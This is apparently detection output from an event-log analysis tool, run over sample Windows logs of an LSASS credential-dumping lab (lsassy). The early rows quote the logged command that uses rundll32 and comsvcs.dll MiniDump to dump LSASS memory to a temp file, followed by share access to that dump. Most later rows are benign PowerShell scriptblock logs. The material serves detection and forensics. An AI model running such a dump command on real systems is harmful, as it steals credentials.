2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be03c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:09.961 +09:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be03c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\2V7Be7Gq.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x998 | User: FS03$ | LID: 0x3e4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.214 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.526 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\2V7Be7Gq.dmp full | Path: C:\Windows\System32\rundll32.exe | PID: 0xff8 | User: admmig | LID: 0x26be03c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:10.542 +09:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:11.230 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:12.553 +09:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,../hayabusa-rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:13.725 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:29:22.291 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx
2021-10-20 23:39:26.224 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) "" # .Link # http://go.microsoft.com/fwlink/?LinkID=225750 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# Options include: RelativeFilePaths - [bool] Always resolve file paths using Resolve-Path -Relative. The default is to use some heuristics to guess if relative or absolute is better. To customize your own custom options, pass a hashtable to CompleteInput, e.g. return [System.Management.Automation.CommandCompletion]::CompleteInput($inputScript, $cursorColumn, @{ RelativeFilePaths=$false } #> [CmdletBinding(DefaultParameterSetName = 'ScriptInputSet')] Param( [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 0)] [string] $inputScript, [Parameter(ParameterSetName = 'ScriptInputSet', Mandatory = $true, Position = 1)] [int] $cursorColumn, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 0)] [System.Management.Automation.Language.Ast] $ast, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 1)] [System.Management.Automation.Language.Token[]] $tokens, [Parameter(ParameterSetName = 'AstInputSet', Mandatory = $true, Position = 2)] [System.Management.Automation.Language.IScriptPosition] $positionOfCursor, [Parameter(ParameterSetName = 'ScriptInputSet', Position = 2)] [Parameter(ParameterSetName = 'AstInputSet', Position = 3)] [Hashtable] $options = $null ) End { if ($psCmdlet.ParameterSetName -eq 'ScriptInputSet') { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#inputScript#> $inputScript, <#cursorColumn#> $cursorColumn, <#options#> $options) } else { return [System.Management.Automation.CommandCompletion]::CompleteInput( <#ast#> $ast, <#tokens#> $tokens, <#positionOfCursor#> $positionOfCursor, <#options#> $options) } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$space = New-Object System.Management.Automation.Host.BufferCell $space.Character = ' ' $space.ForegroundColor = $host.ui.rawui.ForegroundColor $space.BackgroundColor = $host.ui.rawui.BackgroundColor $rect = New-Object System.Management.Automation.Host.Rectangle $rect.Top = $rect.Bottom = $rect.Right = $rect.Left = -1 $origin = New-Object System.Management.Automation.Host.Coordinates $Host.UI.RawUI.CursorPosition = $origin $Host.UI.RawUI.SetBufferContents($rect, $space) # .Link # http://go.microsoft.com/fwlink/?LinkID=225747 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-20 23:39:26.240 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,param([string[]]$paths) $OutputEncoding = [System.Console]::OutputEncoding if($paths) { foreach ($file in $paths) { Get-Content $file | more.com } } else { $input | more.com },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx
2021-10-20 23:39:26.255 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME Get-Help .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='AllUsersView', HelpUri='http://go.microsoft.com/fwlink/?LinkID=113316')] param( [Parameter(Position=0, ValueFromPipelineByPropertyName=$true)] [string] ${Name}, [string] ${Path}, [ValidateSet('Alias','Cmdlet','Provider','General','FAQ','Glossary','HelpFile','ScriptCommand','Function','Filter','ExternalScript','All','DefaultHelp','Workflow')] [string[]] ${Category}, [string[]] ${Component}, [string[]] ${Functionality}, [string[]] ${Role}, [Parameter(ParameterSetName='DetailedView', Mandatory=$true)] [switch] ${Detailed}, [Parameter(ParameterSetName='AllUsersView')] [switch] ${Full}, [Parameter(ParameterSetName='Examples', Mandatory=$true)] [switch] ${Examples}, [Parameter(ParameterSetName='Parameters', Mandatory=$true)] [string] ${Parameter}, [Parameter(ParameterSetName='Online', Mandatory=$true)] [switch] ${Online}, [Parameter(ParameterSetName='ShowWindow', Mandatory=$true)] [switch] ${ShowWindow}) #Set the outputencoding to Console::OutputEncoding. More.com doesn't work well with Unicode. 
$outputEncoding=[System.Console]::OutputEncoding Get-Help @PSBoundParameters | more",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<# .FORWARDHELPTARGETNAME New-Item .FORWARDHELPCATEGORY Cmdlet #> [CmdletBinding(DefaultParameterSetName='pathSet', SupportsShouldProcess=$true, SupportsTransactions=$true, ConfirmImpact='Medium')] [OutputType([System.IO.DirectoryInfo])] param( [Parameter(ParameterSetName='nameSet', Position=0, ValueFromPipelineByPropertyName=$true)] [Parameter(ParameterSetName='pathSet', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [System.String[]] ${Path}, [Parameter(ParameterSetName='nameSet', Mandatory=$true, ValueFromPipelineByPropertyName=$true)] [AllowNull()] [AllowEmptyString()] [System.String] ${Name}, [Parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [System.Object] ${Value}, [Switch] ${Force}, [Parameter(ValueFromPipelineByPropertyName=$true)] [System.Management.Automation.PSCredential] ${Credential} ) begin { try { $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('New-Item', [System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd -Type Directory @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline() $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 
23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"param( [Parameter(ValueFromPipeline=$true)] [string[]] $verb = '*' ) begin { $allVerbs = [PSObject].Assembly.GetTypes() | Where-Object {$_.Name -match '^Verbs.'} | Get-Member -type Properties -static | Select-Object @{ Name='Verb' Expression = {$_.Name} }, @{ Name='Group' Expression = { $str = ""$($_.TypeName)"" $str.Substring($str.LastIndexOf('Verbs') + 5) } } } process { foreach ($v in $verb) { $allVerbs | Where-Object { $_.Verb -like $v } } } # .Link # http://go.microsoft.com/fwlink/?LinkID=160712 # .ExternalHelp System.Management.Automation.dll-help.xml",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[CmdletBinding()] param( [ValidateRange(2, 2147483647)] [int] ${Width}, [Parameter(ValueFromPipeline=$true)] [psobject] ${InputObject}) begin { try { $PSBoundParameters['Stream'] = $true $wrappedCmd = $ExecutionContext.InvokeCommand.GetCommand('Out-String',[System.Management.Automation.CommandTypes]::Cmdlet) $scriptCmd = {& $wrappedCmd @PSBoundParameters } $steppablePipeline = $scriptCmd.GetSteppablePipeline($myInvocation.CommandOrigin) $steppablePipeline.Begin($PSCmdlet) } catch { throw } } process { try { $steppablePipeline.Process($_) } catch { throw } } end { try { $steppablePipeline.End() } catch { throw } } <# .ForwardHelpTargetName Out-String .ForwardHelpCategory Cmdlet #>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
Log,Set-Location A:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location B:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location C:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location D:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location E:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location F:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location G:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location H:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location I:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location J:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location K:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location 
L:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location M:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location N:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location O:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location P:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Q:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump 
with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location R:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location S:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location T:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location U:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location V:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location 
W:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location X:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Y:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location Z:,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location ..,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-Location \,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with 
LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.255 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Read-Host 'Press Enter to continue...' | Out-Null,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,$this.ServiceName,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDateTime($args[0]),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.302 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,[System.Management.ManagementDateTimeConverter]::ToDmtfDateTime($args[0]),../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID800-4103-4104-LSASS dump with LSASSY (PowerShell).evtx 2021-10-20 23:39:26.349 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock 
